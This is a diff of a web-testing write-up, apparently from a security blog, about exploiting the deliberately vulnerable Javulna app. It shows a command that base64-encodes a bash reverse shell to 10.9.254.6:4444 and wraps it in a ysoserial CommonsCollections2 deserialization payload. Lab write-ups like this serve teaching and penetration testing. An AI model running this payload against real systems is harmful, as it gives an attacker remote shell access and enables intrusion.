plackyhacker/plackyhacker.github.io/webtesting/javulna-sqli.md

 ### YSOSerial Reverse Shell

-We can generate a reverse shell payload inside a `ysoserial` payload:
+We can generate a reverse shell payload inside a `ysoserial` payload with a bit of bash wizardry (you can do this using manual steps):

 ```
 payload=`echo "bash -i >& /dev/tcp/10.9.254.6/4444 0>&1" | base64 -w0`;java -jar ysoserial-all.jar CommonsCollections2 "bash -c {echo,$payload}|{base64,-d}|{bash,-i}" | base64 -w0